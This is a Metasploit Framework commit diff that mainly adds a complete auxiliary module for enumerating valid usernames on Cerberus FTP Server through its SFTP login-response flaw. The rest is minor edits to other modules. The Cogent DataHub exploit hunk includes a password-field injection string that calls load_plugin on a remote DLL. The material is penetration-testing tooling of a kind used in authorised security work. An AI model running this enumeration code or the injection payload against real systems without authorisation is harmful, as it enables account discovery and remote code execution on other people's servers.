Land additional cmdstager specs from @jvazquez-r7

zeroSteiner · zeroSteiner · commit c041682c9ba0 · 2014-07-03T11:46:56.000-04:00
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
@@ -116,7 +116,7 @@ def generate_cmdstager(opts = {}, pl = nil)
     self.stager_instance = create_stager
     cmd_list = stager_instance.generate(opts_with_decoder(opts))
 
-    if (cmd_list.nil? or cmd_list.length < 1)
+    if (cmd_list.nil? || cmd_list.length < 1)
       print_error("The command stager could not be generated")
       raise ArgumentError
     end
diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb
@@ -53,7 +53,7 @@ def run_host(ip)
     end
 
     version = res.headers['X-Jenkins']
-    vprint_status("#{peer} - Jenkins Version - #{version}")
+    print_status("#{peer} - Jenkins Version - #{version}")
     report_service(
       :host  => rhost,
       :port  => rport,
@@ -120,17 +120,17 @@ def check_app(app)
         )
       end
     when 403
-      vprint_status("#{peer} - #{uri_path} restricted (403)")
+      print_status("#{peer} - #{uri_path} restricted (403)")
     when 401
-      vprint_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}")
+      print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}")
     when 404
-      vprint_status("#{peer} - #{uri_path} not found (404)")
+      print_status("#{peer} - #{uri_path} not found (404)")
     when 301
-      vprint_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+      print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
     when 302
-      vprint_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+      print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
     else
-      vprint_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}")
+      print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}")
     end
   end
 
diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'IPMI 2.0 RAKP Cipher Zero Authentication Bypass Scanner',
+      'Name'        => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
       'Description' => %q|
         This module identifies IPMI 2.0 compatible systems that are vulnerable
         to an authentication bypass vulnerability through the use of cipher
diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Cerberus FTP Server SFTP Username Enumeration',
+      'Description' => %q{
+        This module uses a dictionary to brute force valid usernames from
+        Cerberus FTP server via SFTP.  This issue affects all versions of
+        the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy
+        in the way the SSH service handles failed logins for valid and invalid
+        users.  This issue was discovered by Steve Embling.
+      },
+      'Author'      => [
+        'Steve Embling', # Discovery
+        'Matt Byrne <attackdebris [at] gmail.com>' # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'URL',  'http://xforce.iss.net/xforce/xfdb/93546' ],
+          [ 'BID', '67707']
+        ],
+      'License'     => MSF_LICENSE,
+      'DisclosureDate' => 'May 27 2014'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(22),
+        OptPath.new(
+          'USER_FILE',
+          [true, 'Files containing usernames, one per line', nil])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new(
+          'RETRY_NUM',
+          [true , 'The number of attempts to connect to a SSH server for each user', 3]),
+        OptInt.new(
+          'SSH_TIMEOUT',
+          [true, 'Specify the maximum time to negotiate a SSH session', 10]),
+        OptBool.new(
+          'SSH_DEBUG',
+          [true, 'Enable SSH debugging output (Extreme verbosity!)', false])
+      ]
+    )
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def retry_num
+    datastore['RETRY_NUM']
+  end
+
+  def check_vulnerable(ip)
+    options = {
+      :port => rport,
+      :auth_methods  => ['password', 'keyboard-interactive'],
+      :msframework   => framework,
+      :msfmodule     => self,
+      :disable_agent => true,
+      :config        => false,
+      :proxies       => datastore['Proxies']
+    }
+
+    begin
+      transport = Net::SSH::Transport::Session.new(ip, options)
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return :connection_error
+    end
+
+    auth = Net::SSH::Authentication::Session.new(transport, options)
+    auth.authenticate("ssh-connection", Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))
+    auth_method = auth.allowed_auth_methods.join('|')
+    print_status "#{peer(ip)} Server Version: #{auth.transport.server_version.version}"
+    report_service(
+      :host => ip,
+      :port => rport,
+      :name => "ssh",
+      :proto => "tcp",
+      :info => auth.transport.server_version.version
+    )
+
+    if auth_method.empty?
+      :vulnerable
+    else
+      :safe
+    end
+  end
+
+  def check_user(ip, user, port)
+    pass = Rex::Text.rand_text_alphanumeric(8)
+
+    opt_hash = {
+      :auth_methods  => ['password', 'keyboard-interactive'],
+      :msframework   => framework,
+      :msfmodule     => self,
+      :port          => port,
+      :disable_agent => true,
+      :config        => false,
+      :proxies       => datastore['Proxies']
+    }
+
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    transport = Net::SSH::Transport::Session.new(ip, opt_hash)
+    auth = Net::SSH::Authentication::Session.new(transport, opt_hash)
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        auth.authenticate("ssh-connection", user, pass)
+        auth_method = auth.allowed_auth_methods.join('|')
+        if auth_method != ''
+          :success
+        else
+          :fail
+        end
+      end
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return :connection_error
+    rescue Net::SSH::Disconnect, ::EOFError
+      return :success
+    rescue ::Timeout::Error
+      return :connection_error
+    end
+  end
+
+  def do_report(ip, user, port)
+    report_auth_info(
+      :host   => ip,
+      :port   => rport,
+      :sname  => 'ssh',
+      :user   => user,
+      :active => true
+    )
+  end
+
+  def peer(rhost=nil)
+    "#{rhost}:#{rport} SSH -"
+  end
+
+  def user_list
+    users = nil
+    if File.readable? datastore['USER_FILE']
+      users = File.new(datastore['USER_FILE']).read.split
+      users.each {|u| u.downcase!}
+      users.uniq!
+    else
+      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
+    end
+
+    users
+  end
+
+  def attempt_user(user, ip)
+    attempt_num = 0
+    ret = nil
+
+    while (attempt_num <= retry_num) && (ret.nil? || ret == :connection_error)
+      if attempt_num > 0
+        Rex.sleep(2 ** attempt_num)
+        print_debug "#{peer(ip)} Retrying '#{user}' due to connection error"
+      end
+
+      ret = check_user(ip, user, rport)
+      attempt_num += 1
+    end
+
+    ret
+  end
+
+  def show_result(attempt_result, user, ip)
+    case attempt_result
+    when :success
+      print_good "#{peer(ip)} User '#{user}' found"
+      do_report(ip, user, rport)
+    when :connection_error
+      print_error "#{peer(ip)} User '#{user}' could not connect"
+    when :fail
+      vprint_status "#{peer(ip)} User '#{user}' not found"
+    end
+  end
+
+  def run_host(ip)
+    print_status "#{peer(ip)} Checking for vulnerability"
+    case check_vulnerable(ip)
+    when :vulnerable
+      print_good "#{peer(ip)} Vulnerable"
+      print_status "#{peer(ip)} Starting scan"
+      user_list.each do |user|
+        show_result(attempt_user(user, ip), user, ip)
+      end
+    when :safe
+      print_error "#{peer(ip)} Not vulnerable"
+    when :connection_error
+      print_error "#{peer(ip)} Connection failed"
+    end
+  end
+end
+
diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -22,7 +22,8 @@ def initialize
         makes insecure use of the datahub_command function with user controlled
         data, allowing execution of arbitrary datahub commands and scripts. This
         module has been tested successfully with Cogent DataHub 7.3.4 on
-        Windows 7 SP1.
+        Windows 7 SP1. Please also note that after exploitation, the remote service
+        will most likely hang and restart manually.
       },
       'Author'      => [
         'John Leitch', # Vulnerability discovery
@@ -50,7 +51,7 @@ module has been tested successfully with Cogent DataHub 7.3.4 on
     register_options(
       [
         OptString.new('URIPATH',   [ true,  'The URI to use (do not change)', '/']),
-        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on ' + 
+        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on ' +
                                                       '(do not change)', 80 ]),
         OptInt.new('WEBDAV_DELAY', [ true,  'Time that the HTTP Server will ' +
                                           'wait for the payload request', 20]),
@@ -374,7 +375,7 @@ def send_injection(dll)
       'vars_post' =>
         {
           'username' => rand_text_alpha(3 + rand(3)),
-          'password' => "#{rand_text_alpha(3 + rand(3))}\")" + 
+          'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
                         "(load_plugin \"#{dll}\" 1)(\""
         }
       }, 1)
@@ -414,7 +415,7 @@ def exploit
       @exploit_unc  = "\\\\#{@myhost}\\"
 
       if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
-        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' + 
+        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
                   'URIPATH=/')
       end
 
@@ -439,7 +440,7 @@ def exploit
           print_error("#{peer} - Unexpected answer")
         end
       else
-        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' + 
+        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
                   '\\\\host\\shared_folder\\base_name.dll')
       end
     end
diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@@ -17,9 +17,9 @@ def initialize(info = {})
       'Description' => %q{
         This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
         weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
-        authentication in the CommunicationServlet component. On the other hand, it's possible to
-        abuse a directory traversal when uploading files thorough the same component, allowing to
-        upload an arbitrary payload embedded in a JSP. The module has been tested successfully on
+        authentication in the CommunicationServlet component. Seond, it's possible to abuse a
+        directory traversal when uploading files thorough the same component, allowing to upload
+        an arbitrary payload embedded in a JSP. The module has been tested successfully on
         HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
       },
       'Author'       =>
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -32,11 +32,9 @@ def initialize(info={})
     super( update_info( info,
       'Name'		=> 'MS14-009 .NET Deployment Service IE Sandbox Escape',
       'Description'	=> %q{
-        This module abuses a process creation policy in the Internet Explorer Sandbox which allows
-        to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
-        exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
-        Level. Further interaction with the component allows to escape the Enhanced Protected Mode
-        and execute arbitrary code with Medium Integrity.
+        This module abuses a process creation policy in Internet Explorer's sandbox, specifically
+        in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the
+        Enhanced Protected Mode, and execute code with Medium Integrity.
       },
       'License'	=> MSF_LICENSE,
       'Author'	=>
diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb
diff --git a/spec/lib/msf/core/exploit/cmdstager_spec.rb b/spec/lib/msf/core/exploit/cmdstager_spec.rb
